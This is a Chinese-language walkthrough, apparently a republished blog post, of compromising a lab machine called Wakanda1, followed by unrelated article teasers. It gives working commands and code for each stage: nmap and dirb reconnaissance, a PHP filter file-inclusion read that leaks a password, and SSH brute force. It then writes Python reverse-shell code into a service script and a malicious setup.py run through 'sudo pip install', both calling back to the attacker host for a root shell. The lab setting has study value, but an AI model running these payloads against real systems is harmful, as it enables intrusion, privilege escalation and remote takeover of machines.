【网络安全】记一次红队渗透实战项目

news2024/11/17 17:30:11

前言

【一一帮助安全学习(网络安全面试题+学习路线+视频教程+工具)一一】

一、信息收集

信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用nmap来演示信息收集

1、nmap扫描存活IP

由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息:

图片.png

本机IP为:192.168.40.177。

发现本kali ip为40段!用40段进行全网段扫描:

nmap -sP 192.168.40.0/24

图片.png

Nmap scan report for localhost (192.168.40.190)

发现项目IP地址:192.168.40.190。

2、nmap全端口服务枚举

进行namp端口服务枚举:

nmap -p- 192.168.40.190

图片.png

得到开放的端口信息:

80/tcp    open  http    
111/tcp   open  rpcbind
3333/tcp  open  dec-notes ssh OpenSSH 6.7p1    
47046/tcp open  unknown

开启了80、111和3333端口,继续探测下端口信息:

nmap 192.168.40.190 -p80,111,3333,35523 -A -T5

图片.png

可以详细看到端口开启的版本信息,就从web页面信息枚举信息!

3、web信息枚举

访问web页面:

http://192.168.40.190/

图片.png

没有什么可用信息!扫描下目录枚举下信息。

4、dirb目录扫描

dirb扫描目录:

dirb http://192.168.40.190/

图片.png

dirb扫出的目录都是访问空白页面!

查看主页的静态源码发现:

图片.png

?lang= ,出现这种形式,很可能是sql注入或文件包含

访问下该目录:

http://192.168.40.190/?lang=fr

图片.png

发现跳转回了主页

利用dirb扫描:

dirb http://192.168.40.190/?lang=

图片.png

发现存在fr和index

http://192.168.40.190/?lang=fr 
 http://192.168.40.190/?lang=index

尝试访问fr.php和index.php,发现都跳转回主页!

http://192.168.40.190/?lang=fr

图片.png

通过抓包分析:curl测试是否存在文件包含响应

curl -i http://192.168.40.190/?lang=fr     
curl -i http://192.168.40.190/?lang=index
-i    ----include 在输出中包含协议响应头

图片.png

图片.png

对比发现:

fr :HTTP/1.1 200 OK
index:HTTP/1.0 500 Internal Server Error

疑似存在文件包含,该文件底层可能存在inclu()函数,开始测试!

三、文件包含

通过过滤器方法绕过枚举出需要读的文件信息。

PHP存在四种过滤器:PHP 过滤器用于验证和过滤来自非安全来源的数据,比如用户的输入。
1)字符串过滤器:
字符串过滤器就是用户输入的内容会转换为大写、小写、ROT13字符、或者去除php标记等功能。
2)转换过滤器:
就是用户输入的数据转换为base64编码和解码功能,还有将字符串转换为 8-bit 字符串功能。
3)压缩过滤器:
zip中有zlib和bzip2等函数协议,功能就是在用户传输中会有压缩文件做一些压缩函数转换功能。
4)加密过滤器
mcrypt 是php里面重要的加密支持扩展库,主要是用mcrypt 扩展库中各种加密函数对用户输入内容进行转换功能。

那么不管是哪些过滤器,都可以尝试下面六种方法去操作测试是否可以进行文件包含:

/index.php?page=/etc/passwd
/index.php?page=.. /../../../../../etc/passwd
index.php?page=php://filter/read=
/index.php?page=php://filter/convert.base64-encode/resource=
/index.php?page=zip://
page=data://

用过滤器测试下文件包含:

curl http://192.168.40.190/?lang=php://filter/convert.base64-encode/resource=index | head -n 1 | base64 -d

图片.png

获得密码:

Niamey4Ever227!!!

但是不知道是哪个用户的密码,爆破ssh获得用户名!

四、ssh用户名枚举爆破

1、cewl枚举用户名

cewl http://192.168.40.190/

图片.png

2、暴力破解ssh

利用实战常用的:gorailgun.exe

记得修改下端口 ,项目ssh端口为3333

图片.png

成功获得用户:mamadou

五、内部信息枚举

1、ssh登录

ssh mamadou@192.168.40.190 -p 3333
Niamey4Ever227!!!

图片.png

输入进来发现这是:Python 2.7.9的命令框

通过python获得bash正常shell:

import pty;
pty.spawn('/bin/bash');

图片.png

获得正常shell!

2、脚本信息枚举

开启http服务上传扫描脚本linpeas.sh:

python -m SimpleHTTPServer 8081 
wget http://192.168.40.177:8081/linpeas.sh

图片.png

上传成功!

赋权并执行脚本,linpeas.sh信息枚举:

chmod +x linpeas.sh
./linpeas.sh

图片.png

图片.png

图片.png

发现如下新信息:

发现新用户是1002,说明包含了2个权限
uid=1001(devops) gid=1002(developer) groups=1002(developer)

root权限pip,PIP是Python包或模块的包管理器,包含模块所需的所有文件
rwxr-sr-- 1 root developer 281 Feb 27 2015 /usr/bin/pip

3、find深入枚举

1)mamadou用户信息枚举

利用find针对mamadou查看可运行权限文件:

/   ---反斜杠从根目录开始查询
-user mamadou  ---搜索普通该用户权限的文件
2>&1   ----将所有错误信息重定向不输出过滤掉
-v   ---就是过滤错误的输出

图片.png

发现flag1:

cat /home/mamadou/flag1.txt

图片.png

Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc

2)devops用户信息枚举

通过前面脚本枚举还发现存在另一个用户:devops,也利用find针对devops查看其可运行权限文件:

find / -user devops 2>&1 | grep -v "Permission denied\|proc"

图片.png

返回三个信息,具体查看下

/srv/.antivirus.py
/tmp/test
/home/devops/flag2.txt

这里返现三个可疑信息:

尝试打开flag2.txt:

cat /home/devops/flag2.txt

图片.png

提示无权限打开!

尝试打开antivirus.py:

cat /srv/.antivirus.py

图片.png

发现这是一个可读可写的python脚本!

open('/tmp/test','w').write('test')

查看下antivirus是否存在计划任务启动该脚本:

find / -name *antivirus* 2>&1 | grep -v "Permission denied\|proc"

图片.png

发现存在antivirus.service服务!

查看下该服务内容:

cat /lib/systemd/system/antivirus.service

图片.png

提示存在该服务存在计划任务,每5分钟devops用户执行一次

RestartSec=300   ---300秒运行一次
User=devops      ---这是devops用户运行

接下来利用该计划任务来编译反弹shell!

六、计划任务反弹shell

1、写入计划任务

本地开启nc端口:

nc -tvlp 9999

图片.png

nano写入反弹shell

nano /srv/.antivirus.py

写入以下shell:
#!/usr/bin/python
def con():
	import socket, time,pty, os
	host='192.168.40.177'
	port=9999
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.settimeout(10)
	s.connect((host,port))
	os.dup2(s.fileno(),0)
	os.dup2(s.fileno(),1)
	os.dup2(s.fileno(),2)
	os.putenv("HISTFILE",'/dev/null')
	pty.spawn("/bin/bash")
	s.close()
con()

图片.png

等5分钟成功反弹devops 用户shell!

图片.png

七、内部信息枚举–devops

1、组信息枚举

cat /etc/group

图片.png

图片.png

developer
1002: —可看到还存在group组里的developer

2、find查看权限文件

利用find针对developer 查看可运行权限文件:

find / -group developer 2>&1 | grep -v "Permission denied\|proc"

图片.png

发现存在:/usr/bin/pip 可运行文件和flag2

3、获取flag

cat /home/devops/flag2.txt

图片.png

Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098

在整个目录中枚举devops:

grep -rn / -e devops 2>&1 | grep -v "Permission denied\|proc"

图片.png

没发现新的东西,但是可看到devops的ID为1002是共用的!

/etc/subgid:11:devops:755360:65536
/etc/group:56:devops:x:1001:
/etc/passwd:29:devops:x:1001:1002:,,,:/home/devops:/bin/bash
/etc/subuid:11:devops:755360:65536

4、sudo提权

尝试sudo提权:

sudo -l

图片.png

提示用户可以在/usr/bin/pip执行sudo

User devops may run the following commands on Wakanda1: (ALL) NOPASSWD: /usr/bin/pip

八、pip提权

pip可执行sudo提权,那就利用pip写入py脚本运行

开启nc反弹shell:

nc -vlp 4455

图片.png

本地添加设置脚本setup.py:

将host更改为本地kali地址,端口随拟。

gedit setup.py

写入以下py脚本:
from setuptools import setup

import socket,subprocess,os

def con():
	import socket, time,pty, os
	host='192.168.40.177'
	port=4455
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.settimeout(10)
	s.connect((host,port))
	os.dup2(s.fileno(),0)
	os.dup2(s.fileno(),1)
	os.dup2(s.fileno(),2)
	os.putenv("HISTFILE",'/dev/null')
	pty.spawn("/bin/bash")
	s.close()
con()

setup(name="root", version="1.0")

图片.png

配置成功!

到tmp目录下上传setup.py脚本至靶机:

cd /tmp
wget http://192.168.40.177:8081/setup.py

上传成功!

sudo运行脚本setup.py:

sudo pip install setup.py .

图片.png

成功获得反弹shell!

获得flag:

cd /root 
cat root.txt

图片.png

flag:821ae63dbe0c573eff8b69d451fb21bc

提权pip:拓展思路

poc:[https://github.com/0x00-0x00/FakePip](https://github.com/0x00-0x00/FakePip)

用代理下载FakePip包:

proxychains git clone https://github.com/0x00-0x00/FakePip.git
图片.png

下载成功!

查看脚本机制并配置参数:

cd FakePip   
cat setup.py
gedit setup.py

图片.png

将lhost改为本地kali地址,端口可不变:

192.168.40.177
13372

图片.png
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/186138.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Java基础】——面向对象:封装

【Java基础】——面向对象:封装一、类和对象二、类的结构:属性、方法、构造器1、属性2、方法2.1、方法的定义2.2、方法的重载2.3、可变个数的形参2.4、方法参数的值传递机制3、构造器3.1、构造器的特征3.2、构造器的作用:3.3、构造器重载三、封装与隐藏1…

细菌,真菌,病毒——感染,免疫反应以及治疗用药差异

谷禾健康 与人类密切相关的微生物 我们的世界大到浩瀚宇宙,小到微观下的生物分子。我们总说漫天繁星,其实身边微生物数量可能更多。动物、植物、真菌、细菌、病毒等,共同构成了丰富多彩的生命世界。 细菌、真菌、病毒是其中的三个大类&#x…

spring integration使用:消息路由

系列文章目录 …TODO spring integration开篇:说明 …TODO spring integration使用:消息路由 spring integration使用:消息路由系列文章目录前言消息路由的概念二、路由的分类基于内容的路由器spring integration中的实现RecipientListRoute…

Python property()函数:定义属性

我们一直在用“类对象.属性”的方式访问类中定义的属性,其实这种做法是欠妥的,因为它破坏了类的封装原则。正常情况下,类包含的属性应该是隐藏的,只允许通过类提供的方法来间接实现对类属性的访问和操作。因此,在不破坏…

AOP的四种增强方式

1. 前置增强,在核心功能之前执行的额外功能 public class MyBeforeAdvice implements MethodBeforeAdvice{Overridepublic void before(Method arg0, Object[] arg1, Object arg2) throws Throwable {System.out.print("this is my before advice!");Str…

渲染函数render

文章目录节点、树以及虚拟 DOM树节点虚拟 DOMvue中render函数的作用render函数去创建子组件内容createElement官方文档参考节点、树以及虚拟 DOM 在深入渲染函数之前&#xff0c;了解一些浏览器的工作原理是很重要的。以下面这段 HTML 为例&#xff1a; <div><h1>…

user-select:none真的能禁止文本的复制粘贴吗?

1. 前言 面向搜索引擎开发时&#xff0c;我们经常看到这样的情况&#xff1a;登录后复制。 由于设置了css属性 user-select:none&#xff0c;此时鼠标无法实现选中文本&#xff0c;也就无法复制文本&#xff0c;通常会采用这种方式来禁止复制文本。打开开发者工具-审查元素&am…

k-means聚类

一、概述 当前人工智能技术实现的一种主要手段是机器学习&#xff0c;而机器学习能够解决的问题主要有三种&#xff1a;分类、聚类、回归&#xff0c;有监督的是分类&#xff0c;无监督的是聚类。所谓聚类&#xff0c;就是以一定的方法将一堆样本依它们本身的数据特性划分成不同…

docker安装mongdb

MongoDB是一个介于关系数据库和非关系数据库之间的产品&#xff0c;是非关系数据库当中功能最丰富&#xff0c;最像关系数据库的。它支持的数据结构非常松散&#xff0c;是类似json的bson格式&#xff0c;因此可以存储比较复杂的数据类型。Mongo最大的特点是它支持的查询语言非…

【操作系统】备忘录

进程上下文切换 用户态、内核态 内核态&#xff1a;也叫内核空间&#xff0c;是内核进程/线程所在的区域。主要负责运行系统、硬件交互。 用户态&#xff1a;也叫用户空间&#xff0c;是用户进程/线程所在的区域。主要用于执行用户程序。 内核态与用户态的区别 内核态与用户…

spring mvc文档阅读笔记——02

目录标题一、Asynchronous Requests&#xff08;异步请求&#xff09;&#xff08;一&#xff09;阻塞和非阻塞,同步和异步&#xff08;二&#xff09;DeferredResult&#xff08;三&#xff09;Callable二、跨域请求CORS&#xff08;一&#xff09;实现跨域请求的方式&#xf…

数据持久化-RDB-AOF

定义 将数据从掉电易失的内存放到永久储存的设备上 因为所有的数据都在内存是&#xff0c;所有必须得持久化 redis提供两种持久化方案 RDB默认开启、AOF RDB 1,保存真是的数据 2&#xff0c;将服务器包含的所有数据库数据以二进制文件形式保存到磁盘里面 3&#xff0c;默认…

JDBC管理事务

基本介绍 就是处理在mysql的事务 复习一下:事务是一组sql语句需要开启和提交&#xff0c;事务中的sql语句要么全部生效&#xff0c;要么全部不生效&#xff0c;提交之后就是全部生效&#xff0c;中间可以设置保存点&#xff0c;回退到保存点&#xff0c;或直接回退到最开始事务…

1.2.1存储结构:层次化存储结构、外存(辅存)、内存(主存)、CPU内部的寄存器、Cache(相联存储器)

1.2.1存储结构&#xff1a;层次化存储结构、外存&#xff08;辅存&#xff09;、内存&#xff08;主存&#xff09;、CPU内部的寄存器、Cache&#xff08;相联存储器&#xff09;存储系统--层次化存储结构外存&#xff08;辅存&#xff09;内存&#xff08;主存&#xff09;CPU…

并发编程学习(八):ReentrantLock

ReentrantLock 是java.util.concurrent.locks包下的类。相对于synchronized,它具备如下特性&#xff1a;可中断。可以设置超时时间。可以设置公平锁。支持多个条件变量。即可以有个多个waitset等待队列。与synchronized都支持可重入。ReentrantLock的基本语法&#xff1a;// 获…

数学建模相关竞赛零基础上手与入门介绍

文章目录1、赛事介绍与报名2、学习与训练2.1 比赛题目选择范围2.2 赛前组队与分工2.3 比赛时间分配1、赛事介绍与报名 什么是数学建模&#xff1f; 定义&#xff1a; 生活中的各种问题(如股票预测、火灾报警统计等)&#xff0c;运用数学的方式去阐述并解决它。 数学建模赛事 …

cisp证书含金量怎么样?值不值得考?

这是CISP考试报名条件参考&#xff1a; 成为CISP&#xff0c;必须满足以下基本要求&#xff1a; 申请CISE、CISO注册资质&#xff0c;需满足以下教育和工作经验要求&#xff1a; &#xff08;1&#xff09;教育和工作经历要求&#xff1a;硕士及硕士以上学历&#xff0c;具备…

LabVIEW在实时目标上使用文件路径

LabVIEW在实时目标上使用文件路径文件路径和结构因目标操作系统而异。本文档讨论了推荐的LabVIEW编码实践&#xff0c;用于指定文件路径&#xff0c;以便应用程序可以无缝地从目标移动目标。实时操作系统选项所有NI实时控制器运行三种不同的操作系统之一&#xff0c;即PharLap、…

Find My资讯|美国航班取消,出行者疯狂购买苹果AirTag追踪行李箱

美国西南航空&#xff08;Southwest Airlines Co.&#xff09;由于所使用的 SkySolver 系统在圣诞假期间崩溃&#xff0c;导致航班出现大面积延误或取消&#xff08;大约 13000 个航班受到影响&#xff09;&#xff0c;让公司损失超过 8 亿美元&#xff08;当前约 53.76 亿元人…

5.kafka--生产调优

文章目录Leader Partition负载均衡消费者初始化流程消费者再平衡生产者和消费者如何提高吞吐量如何发送大消息Leader Partition负载均衡 参数名称描述auto.leader.rebalance.enable默认是true。自动LeaderPartition平衡。生产环境中&#xff0c;leader重选举的代价比较大&…